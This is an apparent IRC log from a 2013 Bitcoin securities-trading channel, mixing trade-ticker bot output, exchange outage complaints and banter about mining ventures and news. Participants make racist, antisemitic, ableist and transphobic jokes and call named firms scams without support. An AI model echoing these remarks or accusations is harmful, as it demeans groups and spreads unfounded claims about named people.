0.03029 BTC [+] Aug 23 15:16:03 [BTCTC] [TAT.ASICMINER] 5 @ 0.02998 = 0.1499 BTC [+] Aug 23 15:16:34 [BTCTC] [DMS.MINING] 93 @ 0.003439 = 0.3198 BTC [+] Aug 23 15:17:54 [HAVELOCK] [SDSTM] 31 @ 0.005 = 0.155 BTC [-] Aug 23 15:24:29 [BTCTC] [DMS.MINING] 9 @ 0.003439 = 0.031 BTC [+] Aug 23 15:28:02 .d Aug 23 15:28:03 50810339.04828 | Next Diff in 203 blocks | Estimated Change: 28.9518% in 1d 0h 2m 46s Aug 23 15:28:22 [BTCTC] [KENILWORTH] 12 @ 0.001798 = 0.0216 BTC [+] Aug 23 15:34:26 So I need another dump this morning Aug 23 15:35:54 [BTCTC] [LABCOIN] 354 @ 0.002621 = 0.9278 BTC [+] Aug 23 15:39:45 Nah not that kind lol Aug 23 15:39:59 but you do bring up a good point Aug 23 15:40:08 I haven't had some good indian food in a while now Aug 23 15:40:55 ;) Aug 23 15:42:31 http://kdvr.com/2013/08/21/sparks-fly-after-sen-marbles-fried-chicken-comment-in-poverty-hearing/ Aug 23 15:42:32 Sparks fly after Sen. Marble’s ‘chicken’ comment in poverty hearing | KDVR.com Aug 23 15:42:58 "Democratic lawmakers couldn’t believe their ears as they listened to Sen. Vicki Marble, R-Fort Collins, deliver a long soliloquy explaining that more blacks and Hispanics live in poverty, in part, because of fried chicken." Aug 23 15:44:06 lolwtf Aug 23 15:44:06 Now I want some fried chicken Aug 23 15:44:54 don't forget watermelon Aug 23 15:44:56 Marble owns and maintains two businesses in the bail bonds industry in the Fort Collins area, and resides there with her two sons. Aug 23 15:45:02 dude... she'd know, srsly. Aug 23 15:45:51 http://i.imgur.com/k7dTaLj.jpg Aug 23 15:45:55 Marble was appointed to serve on the Senate Education and Local Government Committees. Aug 23 15:45:57 bwahaha Aug 23 15:46:07 and she's a 2012 senate noob. Aug 23 15:47:20 "When you look at life expectancy, there are problems in the black race: sickle-cell anemia is something that comes up, diabetes is something that’s prevalent in the genetic makeup and you just can’t help it,” Marble said. “Although I’ve got to say, I’ve never had better BBQ and better chicken and ate better in my life than when you go down south and you — I love it.” Aug 23 15:47:45 ThickAsThieves dude srsly, what is teh libertard press about ? Aug 23 15:49:51 hehe Aug 23 15:50:31 this came onto my radar from my facebook easy-going black friends Aug 23 15:50:36 they just think white people are funny Aug 23 15:50:45 Hah. Aug 23 15:50:56 White people ARE funny. Aug 23 15:50:59 well this particular chick is pretty funny fo sho. Aug 23 15:51:05 white people are funny, but looks aren't everything Aug 23 15:51:14 White, Republican, Female. Check, check, check. Aug 23 15:51:39 basically state houses are a sort of retard olympics for the politicians Aug 23 15:52:58 maybe the problem is that if you're smart, reasonable, productive, etc, what motivation do you have to be a politician. To get frustrated by idiots all day? Aug 23 15:53:24 and if you do somehow end up a politician, why;d you go into state politics Aug 23 15:53:33 it's like going to med school to become a nurse. Aug 23 15:53:45 "only paralegal with a duke law degree in the world" Aug 23 15:54:08 my local city commission is like a constant clown show Aug 23 15:54:25 it has 3 Tea Party people Aug 23 15:54:46 they have here this hysterical situation whereby all the buildings were owned by the state in communist times, but then passed after the revolution as indivise property to the ex-tenants. Aug 23 15:54:47 hm Aug 23 15:54:51 is something happening with website? Aug 23 15:54:54 so each and every building has a sort of mini-parliament Aug 23 15:55:01 made out of people who just happened to be living there. Aug 23 15:55:03 it's a riot. Aug 23 15:55:12 gatz you mean website generally ? Aug 23 15:55:33 i miss website Aug 23 15:56:00 yop Aug 23 15:56:01 Access temporarily denied. Aug 23 15:56:03 this ^ Aug 23 15:56:05 at btct Aug 23 15:56:17 [HAVELOCK] [AM100] 1 @ 0.0301 BTC [-] Aug 23 15:56:18 cant see market at all Aug 23 15:56:32 o, you mean btctc. well, there's been people complaining all day but no statement as of yet. Aug 23 15:56:48 damn Aug 23 15:57:03 [HAVELOCK] [XBOND] 7 @ 0.0011707 = 0.0082 BTC [-] Aug 23 15:57:12 works fine for me Aug 23 15:57:14 burnside is doing updates without prior announcement like every time i guess Aug 23 15:57:25 I use Chrome Aug 23 15:57:26 login freezes Aug 23 15:57:35 they were streaming quotes up until an hour or so ago at any rate. Aug 23 15:59:59 [HAVELOCK] [XBOND] [PAID] 1.00978800 BTC to 2`019`576 shares, 50 satoshi per share Aug 23 16:00:27 http://www.coindesk.com/bitshares-p2p-trading-platform-to-offer-dividends-on-bitcoins/ Aug 23 16:00:37 site could not look more scammy: http://tradebitshares.com/ Aug 23 16:00:59 [HAVELOCK] [XBOND] 12 @ 0.00108001 = 0.013 BTC [-] Aug 23 16:01:00 [HAVELOCK] [XBOND] 1 @ 0.00108001 BTC [-] Aug 23 16:01:15 i have no idea what coindesk is doing pushing all the shit. Aug 23 16:01:40 then again perhaps neither do they. Aug 23 16:03:45 no assbot come baaack Aug 23 16:04:30 fuk Aug 23 16:04:32 it's Aug 23 16:04:33 all Aug 23 16:04:33 gone Aug 23 16:04:34 guys Aug 23 16:04:37 this is Aug 23 16:04:39 awww Aug 23 16:04:53 simmer down eh Aug 23 16:07:06 sell it all! shut it down! Aug 23 16:07:09 Ron Paul AMA on Bitcoin: "... The government should not get involved in regulating private money if there is no fraud. I do not take a position on Bitcoin ... in a technical fashion, but I understand the political ramifications of them and I think that government should stay out of them ..." Aug 23 16:18:44 https://bitcointalk.org/index.php?topic=226159.msg2380058#msg2380058 Aug 23 16:18:51 [WTS] 1981 DeLorean DMC-12 Aug 23 16:21:00 That seems pricey. Aug 23 16:21:52 Wow. I'll be damned: http://delorean.com/for-sale/ Aug 23 16:22:24 http://www.forbes.com/sites/ericjackson/2013/08/20/rob-mcewen-interview-on-gold-prices-gold-miners-and-bitcoin/3/ Aug 23 16:22:27 Rob McEwen Interview: On Gold Prices, Gold Miners And Bitcoin - Forbes Aug 23 16:23:20 and fried chicken Aug 23 16:25:22 http://gavintech.blogspot.com/2013/08/the-macro-economics-of-alt-coins.html Aug 23 16:25:25 GavinTech: The macro-economics of alt-coins Aug 23 16:25:58 Gavin doesn't like altcoins, for mostly ironic and innaccurate reasons Aug 23 16:26:22 [22:06:24] topace is keeping quiet anyway, looks like MP scared him into silence :) Aug 23 16:26:26 ^ or i was not in the office :p Aug 23 16:26:26 i don't hate them but i think they're pretty pointless Aug 23 16:26:34 "Creating gazillions of alt-coins seems to me to just be a way of getting back to an "inflate on demand" world. Not enough genuine Bitcoin money for you? No problem! Create a new alt-coin to produce more!" Aug 23 16:26:39 [21:59:30] ...where did he get that from? Can't see it in the bitcointalk thread. Aug 23 16:26:46 ^ yes that came via email from CFIG Aug 23 16:26:54 well, you can't have money competition without money competition Aug 23 16:26:57 ^and confirmed by phone Aug 23 16:28:06 "I would have no theoretical objections if demand for alt-coins didn't affect the demand for Bitcoin-- if they operated in some completely different market. " Aug 23 16:28:30 his objections aren't theoretical, they are biased (which he does admit earlier) Aug 23 16:29:34 yeah, it would be neat if everyone decided to only use bitcoins, but that will NEVER happen Aug 23 16:40:20 gg BTCT Aug 23 16:46:52 ThickAsThieves lulzy gavin post, but anyway. Aug 23 16:47:35 lettuce give him a little thrashing Aug 23 16:48:00 meh, blogspot. never mind. Aug 23 16:48:05 hehe Aug 23 16:48:25 this is not a conversation, sorry! Aug 23 16:49:22 something along the lines of Alt chains are important for those times when you decide being an idiot is "best for all those involved" Aug 23 16:49:25 BTCT is dead for me too now Aug 23 16:49:32 works for me Aug 23 16:49:46 I really hate how they require you to login in now Aug 23 16:49:47 i made the mistake of trying to withdraw coins Aug 23 16:50:10 http://www.gregpalast.com/larry-summers-and-the-secret-end-game-memo/ sorta lulzy stuff Aug 23 16:51:05 http://articles.latimes.com/2004/nov/04/world/fg-lion4 Aug 23 16:51:22 Lion Attacks an Intruder in Its Den at Taipei Zoo - Los Angeles Times Aug 23 16:51:46 http://www.washingtonsblog.com/2013/08/west-coast-of-north-america-to-be-hit-hard-by-fukushima-radiation.html Aug 23 16:51:50 kinda nice animations. Aug 23 16:52:00 West Coast of North America to Be Hit Hard by Fukushima Radiation | Washington's Blog Aug 23 16:55:06 payback eh Aug 23 16:56:01 i'm surprised it will take so long to reach the coast Aug 23 16:56:11 i thought the ocean churned faste rthan that Aug 23 16:57:08 apparently its a coupla years. Aug 23 16:57:21 VanCleef heh i guess. apparently they are leaking A LOT Aug 23 16:57:46 sorry, is btct down for anyone? Aug 23 16:57:58 meanwhile US news is priming up a war in Syria/Egypt Aug 23 16:58:15 gotta do something to keep the money coming in Aug 23 16:58:22 who cares that california will spawn godzillas Aug 23 16:59:36 inb4 tinfoil hat conspiracy of how fukushima was done by us govt to create an army of mutant godzilla warriors out of hippy valley chicks. Aug 23 16:59:36 jewzilla Aug 23 16:59:53 so uhh btct? Aug 23 17:00:42 VanCleef http://log.bitcoin-assets.com/#252688 Aug 23 17:01:11 mp is http://www.gregpalast.com/larry-summers-and-the-secret-end-game-memo/ how things really went down or is this partly tinfoilhattery Aug 23 17:01:23 i would say it's mostly insanity Aug 23 17:01:31 ahh check, thanks for that Aug 23 17:01:35 wrapped in aluminum to take home if you can't finish in one sitting Aug 23 17:02:17 heh yeh tradebitshares Aug 23 17:02:29 coindesk etc, funny news Aug 23 17:03:53 https://bitcointalk.org/index.php?topic=222565.msg2992830#msg2992830 Aug 23 17:03:57 SANDSTORM: - A Collective Investment Vehicle for BTC. - Aug 23 17:03:58 poor fund managers Aug 23 17:04:27 16% nav down? Aug 23 17:04:27 "The last week has been brutal week for anyone in a long position on most securities. Unfortunately Sandstorm is in that position. Overall, there was big losses in terms of NAV. I tried to minimise these damages. In hindsight I can think of many ways that I could have prevented these losses. " Aug 23 17:04:59 The NAV of this "fund" is way less than most peoples PAs Aug 23 17:05:01 "Active Miner has increased in confidence in my mind. I have made trades according to these confidence levels. The remaining 1000 Labcoin shares will be more of a long term position as more than the Initial investment has been recovered." Aug 23 17:05:10 lessons are hard to learn i guess Aug 23 17:05:21 people trading on confidence levels in their mind and pretending they're managing funds... Aug 23 17:05:29 "This has been a hard week for most investors I believe. Please hold off altogether harsh judgements until next week." Aug 23 17:05:39 too soon, mp Aug 23 17:05:52 hehe Aug 23 17:06:00 right. because we define "investors" as "idiots like us" and then we proceed to bemoan how "all the world" is in the same position. Aug 23 17:06:07 fascinatingly american through and through. Aug 23 17:06:16 You know what BTCT needs Aug 23 17:06:20 a stock loan desk Aug 23 17:06:32 matuszed yeah. Aug 23 17:06:43 that's hilarious tat Aug 23 17:06:50 Get some real price discovery Aug 23 17:06:50 i should have the girl dig up that post where some guy was threatening me to lend me shares to short Aug 23 17:06:54 and then never carrying through. Aug 23 17:07:31 but anyway, ftr, matuszed : mpex has always had everything shortable, mpex was always tyhe only one to do so, i've been saying this is broken forever and all the idiots pretending they are in this business dutifully ignored it all along. Aug 23 17:08:29 oh Aug 23 17:08:37 I think btct should have nicer graphs at all Aug 23 17:08:38 ;p Aug 23 17:08:38 it's easier to pretend like i'm mean rather than face the implications of acting the scammer. Aug 23 17:10:05 Yeah. No one made any coin off this recent downturn, right? If I were him I'd be rethinking running a fund... Aug 23 17:10:29 except he didn't think it through on teh first pass. Aug 23 17:10:30 gatz, have you seen coinflow.co? Aug 23 17:10:44 ^ coinflow.co is nice. Aug 23 17:11:10 Had he run a fund before mircea_popescu ? Aug 23 17:11:30 ThickAsThieves: that undone project? yes Aug 23 17:11:30 i meant when he started this one. Aug 23 17:11:36 Gotcha. Aug 23 17:11:48 undone? Aug 23 17:12:13 do you mean incomplete? Aug 23 17:13:15 the guy's at least trying... Aug 23 17:16:15 ThickAsThieves: for me looks someone took with stock.js fw and just made it, any tunes there o_O Aug 23 17:16:22 that pie charts are not worth ¢ Aug 23 17:16:49 like for me is missing there features like add some tabs more graphs next each other Aug 23 17:17:19 you asked for better charts Aug 23 17:17:25 they have the best Aug 23 17:17:26 i couldn't parse that. Aug 23 17:17:28 make insights, digest from numbers Aug 23 17:17:32 yes, much room for growth Aug 23 17:17:43 but that is a good thing Aug 23 17:17:45 at least, it much better than origin btct.. Aug 23 17:17:51 *its Aug 23 17:18:04 much better than every stock exchange charts, no? Aug 23 17:18:12 (in bitcoin) Aug 23 17:18:26 candstickcharts or it didn't happen Aug 23 17:18:36 well Aug 23 17:18:42 I like bitcoinity that days Aug 23 17:18:49 but someone can do better Aug 23 17:19:03 we need forward this trading as well Aug 23 17:19:24 ? Aug 23 17:19:48 i assume english is not your primary language Aug 23 17:20:46 .d Aug 23 17:20:50 50810339.04828 | Next Diff in 185 blocks | Estimated Change: 29.2215% in 0d 21h 47m 2s Aug 23 17:20:57 ThickAsThieves what gave it away ? Aug 23 17:22:18 wow btctco is hella slow Aug 23 17:22:34 must be getting ddosed Aug 23 17:23:57 in a 24-hour trading environment, I usually don't mind when one of the sites is down for a bit Aug 23 17:31:01 pause the nasdaq! gets those machines back on! Aug 23 17:32:54 http://www.forbes.com/sites/steveschaefer/2013/08/23/microsoft-ceo-steve-ballmer-to-retire-in-next-12-months/ Aug 23 17:32:57 Microsoft CEO Steve Ballmer To Retire In Next 12 Months - Forbes Aug 23 17:33:03 about time Aug 23 17:33:06 Just saw that headline. Aug 23 17:33:18 Strock popped 10% in the pre open Aug 23 17:33:22 MS has been canning people like crazy... Aug 23 17:33:36 Wonder if this is part of that. Aug 23 17:33:37 "Shares of Microsoft shot higher in pre-market trading and were up nearly 8% just after the open" Aug 23 17:33:54 ballmer was a failed experiment Aug 23 17:33:54 Thats a huge move for MSFT Aug 23 17:33:59 thats like a 10 vol stock Aug 23 17:34:01 i still can only think of his gorilla impersonation Aug 23 17:34:29 sell GOOG, buy MSFT! Aug 23 17:34:56 "Since Ballmer took the reins Microsoft shareholders have had a negative total return of nearly 20%, with the stock down 36%, according to data from FactSet. While some of that decline can be attributed to the tech sector’s rapid descent from the heights of the dot-com bubble, Microsoft has frustrated investors for years with its inability to translate a massive cash generation machine into stoc Aug 23 17:34:56 k market performance." Aug 23 17:36:43 maybe they'll steal yahoo's girl Aug 23 17:38:27 ugh.. the trade volume for both labcoin and activemining has been pretty much 0 for the last 8 hours... I wonder what ratio of its users are north american Aug 23 17:38:37 on btct that is Aug 23 17:38:38 http://www.forbes.com/sites/petercohan/2013/08/12/for-david-karp-marissa-mayer-flushes-81-million-more-of-yahoos-cash-and-stock/ Aug 23 17:38:41 Marissa Mayer Flushes $81 Million More Of Yahoo's Cash And Stock For David Karp - Forbes Aug 23 17:39:16 Would that be a better move, ThickAsThieves? lol Aug 23 17:39:49 bobbabad about 0. Aug 23 17:40:02 i don't imagine the scammers pushing them are based in the us. Aug 23 17:40:23 Almost certainly Nigerian. Aug 23 17:40:42 then why has the trade volume been none, if the scammers were awake and pushing at least we would see some action, no? Aug 23 17:40:44 I need a bot on here that counts how many times you mention scams and scammers mp Aug 23 17:40:48 kleeck he does have a point, a ms/yahoo showdown for that idiot would be exactly in line with both corps history of outstanding performance. Aug 23 17:41:31 Haha. Aug 23 17:41:41 Who can overpay the most! Aug 23 17:41:53 both scammer stocks needs a big whale to cash out (lc, actm) Aug 23 17:42:23 mircea_popescu, maybe you could post a new article about it to spice the market up Aug 23 17:42:35 I think he has a couple Aug 23 17:42:52 something new is needed Aug 23 17:42:52 Yeah... Define "spice". Aug 23 17:43:03 spice girls Aug 23 17:43:09 spice channel Aug 23 17:43:22 Rulother, you're just adding words to "Spice" lol. Aug 23 17:43:22 chinese 5 spice Aug 23 17:43:27 maybe Aug 23 17:43:28 :) Aug 23 17:43:51 Rulother $ grep "scam" FreeNode-#bitcoin-assets.log | grep -c "mircea_popescu" Aug 23 17:43:51 259 Aug 23 17:43:51 $ grep -c "scam" FreeNode-#bitcoin-assets.log Aug 23 17:43:51 812 Aug 23 17:43:58 i got about a third. Aug 23 17:44:07 scam Aug 23 17:44:09 well done. Aug 23 17:44:27 ThickAsThieves: does that matter? Aug 23 17:45:34 only if we are trying to have a conversation Aug 23 17:46:02 http://www.theverge.com/2013/8/23/4650398/snowden-accuses-uk-government-of-leaking-documents-about-itself-in Aug 23 17:46:06 Snowden accuses UK government of leaking documents about itself in smear campaign | The Verge Aug 23 17:46:16 hahaah what. Aug 23 17:46:24 also, did you hear manning wants to be a girl named chelsea ? Aug 23 17:46:31 Yeah. WTF> Aug 23 17:46:32 so US gets UK to pretend Snowden leaked shit, so Russia takes away his safe haven Aug 23 17:46:50 thats how i read that Aug 23 17:46:55 ThickAsThieves lmao kindergarten of world politics & intrigue. Aug 23 17:46:55 Why would Russia care? Aug 23 17:47:05 when did kramer get to rule the western world ?! Aug 23 17:47:18 i think assange and chelsea make a cute couple Aug 23 17:47:58 Snowden can only stay in Russia if promises not to leak any new stuff while there Aug 23 17:48:01 that was his deal Aug 23 17:48:05 i wonder if under obamacare fake tits for some transsexual detained under treason charges is covered or not. Aug 23 17:48:12 lord putin was just playing Aug 23 17:48:20 he's loving the leaks Aug 23 17:49:44 hm something is wrong with Xcoind @btct Aug 23 17:49:56 ThickAsThieves: ou, sry about that ;( Aug 23 17:50:14 https://bitcointalk.org/index.php?topic=280060.msg1521109;topicseen#new Aug 23 17:50:24 Where can i short Tesla stock using bitcoin? Aug 23 17:51:23 haha Aug 23 17:51:47 actually, can't TorBrokers do that? :) Aug 23 17:52:26 didnt tesla just get good press? Aug 23 17:52:34 like safets car or sumth Aug 23 17:52:39 safest* Aug 23 17:52:45 YEa but its trading at lik 1/4 the market cap of gm Aug 23 17:52:56 Anbd only sold like 8k cars last month Aug 23 17:53:01 its trading too high Aug 23 17:53:01 fuckin Ballmer is finally gone. that's only 10 years overdue. lol Aug 23 17:53:02 generally shorting what the redditors like is a great money maker. Aug 23 17:53:30 The PE is 252 Aug 23 17:53:40 And a huge short interest already so the borrow is going to be expensive Aug 23 17:53:42 https://www.youtube.com/watch?feature=player_embedded&v=jCqQ-MyZXRA Aug 23 17:53:44 cuteanimefiguresTV Mighty Morphin Power Rangers To Power Rangers MegaForce Morphing Sequence - YouTu Aug 23 17:53:47 well, guess in 12 months he's done.. :/ Aug 23 17:55:01 i wonder if it were possible to make a tesla-apple joint venture. Aug 23 17:55:12 create a car that you can hold very awkwardly while taking bad pictures Aug 23 17:55:26 cars that you can't repair Aug 23 17:56:04 pretty sure tesla is already those things, no? Aug 23 17:56:04 and can only charge at tesla-approved places Aug 23 17:56:22 and have an enginestore where you cvan download various engines Aug 23 17:56:30 lol Aug 23 17:56:38 none of which work and all of which being re-dressings of the same bad code in different pictures Aug 23 17:56:45 but when does the white version come out?!?! Aug 23 17:56:48 obviously made by the same azn sweatshop Aug 23 17:57:08 the tesla approved places would be so far apart, you could not travel far enough to go to another Aug 23 17:57:17 pankkake this is already the case. Aug 23 17:57:18 people protesting would be told to buy two cars instead Aug 23 17:57:22 haha Aug 23 17:57:24 but they do sue journops that say so Aug 23 17:57:26 no, Aug 23 17:57:28 they are told,m Aug 23 17:57:33 you are driving it wrong Aug 23 17:57:47 which happened also Aug 23 17:57:50 because there'd be a right and a wrong way to drive it, as per the license. Aug 23 17:57:54 seeing hiow it is, after all, your car. Aug 23 17:58:01 and if it is your car then it isn't your car. Aug 23 17:58:04 (Obama) Aug 23 17:59:07 so you really have to buy two cars, like you had to buy two ipads? http://repository.headfucking.net/Images/Apple/multitask.jpg Aug 23 18:07:24 ;;nethash Aug 23 18:07:25 535083.866109 Aug 23 18:07:34 .d Aug 23 18:07:34 50810339.04828 | Next Diff in 178 blocks | Estimated Change: 29.2620% in 0d 20h 59m 45s Aug 23 18:11:17 "Finally, a word about the recent share price collapse. As mentioned on the thread, one of our large, early-stage investors has chosen to liquidate some of his holdings in CipherMine for personal reasons which I cannot share. It is not a reflection on the quality nor merits of our security, however, and it is just unfortunate that a relatively small volume can cause very large price Aug 23 18:11:17 movements in such an illiquid marketplace. I encourage you all to hold fast and be patient. We are still at a very early stage and the real rewards will not come until our ASIC hardware is ready in October." Aug 23 18:11:42 smige? Aug 23 18:11:57 Kate Aug 23 18:12:06 you mean craig Aug 23 18:12:09 i dont think smidge talks anymore Aug 23 18:12:10 right Aug 23 18:12:33 lol what happened to smidge? launch his big fund Aug 23 18:12:41 smidge is probly one of these other new guys if he's around Aug 23 18:12:58 he disappeared when we started calling him usagi Aug 23 18:13:19 ahh Aug 23 18:14:02 His fund is a joke Aug 23 18:14:18 most are Aug 23 18:14:35 I took one look at his spreadsheet and was like nope nope Aug 23 18:15:34 I told him on /r/bitcoinstocks that my profit margins are way better than his so I didn't see any reason to give my funds to him. Aug 23 18:16:20 O that was you? Aug 23 18:16:24 Death something Aug 23 18:16:41 I remember reading the thread and having a good laugh Aug 23 18:16:47 sandstorm doing well Aug 23 18:16:51 lol Aug 23 18:17:52 here's an idea, use some of those funds to create a million dollar business outside of bitcoin Aug 23 18:17:59 So am I one of the few that has btct working? I just haven't seen a trade in nearly an hour Aug 23 18:18:19 "Xcoind backend failure at 135" Aug 23 18:19:19 btct works for me Aug 23 18:19:23 Thought it might be a cache thing, but opened it in firefox instead and still working Aug 23 18:19:57 wtf Aug 23 18:19:59 works in IE... Aug 23 18:20:06 he disappeared when we started calling him usagi <<< iirc he opened a fund, got told better, gave up on opening fund, tried making some info service/index w/e Aug 23 18:20:18 and hasn't been back for a week or two Aug 23 18:20:40 It's been a while, I see him log on from time to time, but he never talks anymore. Aug 23 18:20:51 So am I one of the few that has btct working? I just haven't seen a trade in nearly an hour <<< lmao Aug 23 18:21:08 Well everyone is saying it's down for them Aug 23 18:21:17 something is def broken Aug 23 18:21:35 it worked until i tried to use the wallet Aug 23 18:21:36 it was just very cute. but anyway, someone was saying it worked up to where bitcoins were involved Aug 23 18:21:41 so maybe some demon issue Aug 23 18:22:11 im getting SO MUCH chinese hyip spam it's insane Aug 23 18:22:45 >1k pieces a day, up from 0 last year. Aug 23 18:22:59 Man I used to be big into e-gold and hyip so long ago. Aug 23 18:25:48 Made a ton of cash, had to get out, was getting too greedy. Aug 23 19:07:21 Was just about to harass you topace, but the book is open now,. Aug 23 19:07:41 heh Aug 23 19:07:43 yea Aug 23 19:07:52 i set it to manual Aug 23 19:07:57 so i could confirm things before it went live Aug 23 19:08:28 Makes sense. Aug 23 19:08:47 didnt want a clusterfuck like has happened on some of those other places Aug 23 19:08:58 :P Aug 23 19:09:22 lol Aug 23 19:10:34 topace: Any particular reason you did POST values for getting a specific symbol through the API instead of GET or just URL? Aug 23 19:11:00 log security Aug 23 19:11:11 didnt want params showing up in logfiles Aug 23 19:11:57 Ahhh, okay. Making a little app and noticed that, just curious. No issues on my end for it Aug 23 19:12:11 cool Aug 23 19:12:18 if you have any questions about the API, please ask Aug 23 19:12:54 Not yet, working with android and I haven't done much on URL gets and JSON parsing. So it's fun to learn Aug 23 19:14:32 assbot is offline Aug 23 19:14:58 :( Aug 23 19:15:53 having digestive issues? Aug 23 19:22:24 There's nothing to show as far as btct goes Aug 23 19:22:28 but I need my havelock Aug 23 19:23:39 I don't care enough to read - So was AsicMe just a sea of falling stars? scam Aug 23 19:24:33 I'm not familiar with AsicMe. Aug 23 19:24:42 well wahtever btct is going through right now, i feel their pain Aug 23 19:25:56 I only am because it is the top post on the forum, but I don't want to read it and waste brain cells Aug 23 19:26:00 yes, it's very fishy Aug 23 19:29:11 "ASICME collected 22000 Bitcoin in pre-orders for more than two months, but wasn't able to deliver till now. Furthermore they confessed in a chinese thread that their products ME20 and ME80 are still bugged and there still are unsolved problems. Today ASICME asks for 45000 Bitcoin and claims their company has a value of 180000 Bitcoin." << and they say "it's not our fault, avalon didn't Aug 23 19:29:11 deliver the chips" ... chinese sentiment about them: "Congs to you foreingors , after fucking down chinese users,they are going to insert their disgusting dirty dicks to all of you." Aug 23 19:30:51 lolool Aug 23 19:31:22 lol o my Aug 23 19:42:09 http://intellihub.com/2013/05/29/absolutely-every-one-bluefin-tuna-tested-in-california-waters-contaminated-with-fukushima-radiation/ Aug 23 19:45:54 meat eater problems Aug 23 19:46:28 Not just meat, but those who only eat fish too Aug 23 19:46:45 flesh eater problems Aug 23 19:48:08 since when is fish not meat? Aug 23 19:48:43 Meat is the "edible flesh of animals, especially mammals". Biblically, fish is not meat. Aug 23 19:48:59 Well yes Aug 23 19:49:09 But I guess I more so read meat as in land animals Aug 23 19:49:15 meat is meat Aug 23 19:49:16 btctc still down eh? Aug 23 19:49:20 bibles are bibles Aug 23 19:49:28 words are words Aug 23 19:49:31 I withdrawl my comment :) Aug 23 19:49:32 definitions are definitions Aug 23 19:49:39 semantics Aug 23 19:49:53 last recorded trade at 845 EDT Aug 23 19:49:55 hehehe Aug 23 19:50:00 nuuuuked yo Aug 23 19:50:15 yo mr. popescu Aug 23 19:50:16 .d Aug 23 19:50:18 50810339.04828 | Next Diff in 168 blocks | Estimated Change: 29.0453% in 0d 19h 51m 24s Aug 23 19:50:27 nope seeing some trades come through now Aug 23 19:51:56 not me Aug 23 19:51:59 where you dee Aug 23 19:52:04 see trades?? Aug 23 19:53:14 under realtime Aug 23 19:54:04 i cant view assets pages Aug 23 19:54:08 da fuck Aug 23 20:36:48 dammit assbot Aug 23 20:41:08 Topace, question: I see on the CFIG overview that 173,282 shares are outstanding, which means their are 26,718 left to be sold. However, I also see, under "Public Offerin" that their are 43,386 shares remaining meaning the outstanding is at 156,614... Which is it? Aug 23 20:49:24 mircea_popescu: first rule of bitcoin-assets is you dont talk about bitcoin-assets Aug 23 20:51:02 The numbers MUST add up. Aug 23 20:51:11 THEY MUST!!! Aug 23 20:51:56 yknow there is a Havelock channel Aug 23 20:52:08 I did not. Aug 23 20:52:11 #havelockinvestments Aug 23 20:52:20 Excellent. Thank you. Aug 23 20:52:23 np Aug 23 20:52:49 Thanks, I did not know either Aug 23 20:52:59 it's somewhat new Aug 23 20:53:18 You've probably never heard of it Aug 23 20:53:29 Hipster Aug 23 20:53:51 CryptoHipster. Aug 23 20:54:05 Crypster. Aug 23 20:54:08 my altcoin is so obscure it doesn't even have a genesis block! Aug 23 20:54:38 Crypster.... hmm Aug 23 20:54:49 If I were you I'd be pre-premining that, man! Aug 23 20:55:34 Is that like planning to plan to mine? Aug 23 20:56:16 What you've never heard of pre-premining? Ha. Aug 23 20:57:18 Well, Topace doesn't appear to be active in his channel either so... I will never discover the truth. Aug 23 20:57:41 mmm food Aug 23 20:57:47 sakmon on rye bread Aug 23 20:57:51 salmon* Aug 23 20:59:24 he's likely just afk Aug 23 20:59:28 obv Aug 23 20:59:40 I'm being a bit dramatic. Aug 23 21:03:46 par for the course though Aug 23 21:08:09 so everything is down? Aug 23 21:08:30 No. Aug 23 21:08:56 oh rite.. realtime tab now updates Aug 23 21:09:29 Oh, really ? That'll be nice. Aug 23 21:09:42 ppl selling lc Aug 23 21:09:46 0025 Aug 23 21:09:48 yup Aug 23 21:09:50 noticed. Aug 23 21:09:58 yaye Aug 23 21:14:35 wtb 1 assetbot Aug 23 21:14:40 sorry... assbot Aug 23 21:16:01 I only have buttbots to sell Aug 23 21:16:29 Can I upgrade it later and keep my place in que? Aug 23 21:18:42 will lc deliver massive news monday? or will it not and shareprice goes back to 17? Aug 23 21:18:56 nice binary trade Aug 23 21:20:31 Doubt it will go back to 17 Aug 23 21:20:57 But who knows about news, no one is ever really on time with giving news Aug 23 21:21:56 if news is bad it should test breakout point.. assuming that's what's causing the rise Aug 23 21:22:27 I doubt they will give bad news, if it is bad, there will be no news Aug 23 21:22:46 right :p Aug 23 21:23:07 And then they'll find something positive to say on Tuesday Aug 23 21:23:15 and boom Aug 23 21:23:41 "We have been hard at work testing these chips, things are starting to look on the uppy up. We expect full production start soon (tm)" Aug 23 21:24:11 If there is no news, I suspect it to drop to around .0022 - .0023 Aug 23 21:24:25 no pics Aug 23 21:24:39 People seem to still not care about the whole share locking Aug 23 21:24:40 and the china factor Aug 23 21:24:43 rolled cores Aug 23 21:25:18 bitcointalk down for anyone? Aug 23 21:25:20 possibility of unpredicatable issues with clock frequency or power draw Aug 23 21:25:45 ActM is in the same boat with chip news Aug 23 21:26:10 It truly boogles the mind frankly Aug 23 21:26:17 yeah but their design is unrolled Aug 23 21:26:25 Yes from what we've been told Aug 23 21:26:25 one hash per cycle Aug 23 21:26:27 (TOLD) Aug 23 21:26:59 They have the same amount of room to talk like Labcoin Aug 23 21:27:23 If Labcoin can actually show a demo/video of their chips working, that'll be more than what actm has been able to do Aug 23 21:29:35 yeah Aug 23 21:30:00 In my eyes, both of them are still scams. Aug 23 21:30:16 That being said, I'm also invested in both. Aug 23 21:30:22 lol Aug 23 21:30:26 lol Aug 23 21:30:48 I'm a day trader, so I'm not in it for the long run. Aug 23 21:32:26 i want div's Aug 23 21:33:06 There's that Aug 23 21:43:29 cfig order is corrected Aug 23 21:47:36 Topace #1. Aug 23 22:09:55 been so long without my assbot :( Aug 23 22:10:25 it's at the proctologist Aug 23 22:10:32 got a massive hemorroid leak Aug 23 22:10:55 :(((((((( Aug 23 22:12:35 o well, that's nice lol Aug 23 22:24:49 http://i.imgur.com/KaBv2aJ.jpg Aug 23 22:31:27 what happened to bfmines Aug 23 22:33:07 Rulother http://i.imgur.com/rtTNWy8.jpg Aug 23 22:33:47 Yes, but at the time he played batman he wasn't bad, at least imo Aug 23 22:36:54 yo Aug 23 22:36:58 is there new batman out or what? Aug 23 22:39:47 The next super man will have batman in it Aug 23 22:53:08 HI Aug 23 22:53:29 I would like to know whether I should invest in ASICminers or ASICminer PT Aug 23 22:55:07 back. Aug 23 22:56:08 \o/ Aug 23 22:57:35 [BTCTC] [LABCOIN] 482 @ 0.00269 = 1.2966 BTC [-] Aug 23 22:57:36 [BTCTC] [LABCOIN] 372 @ 0.002698 = 1.0037 BTC [+] Aug 23 22:58:44 \m/ Aug 23 22:59:11 [BTCTC] [LABCOIN] 66 @ 0.002686 = 0.1773 BTC [-] Aug 23 22:59:12 nice Aug 23 22:59:19 I missed your 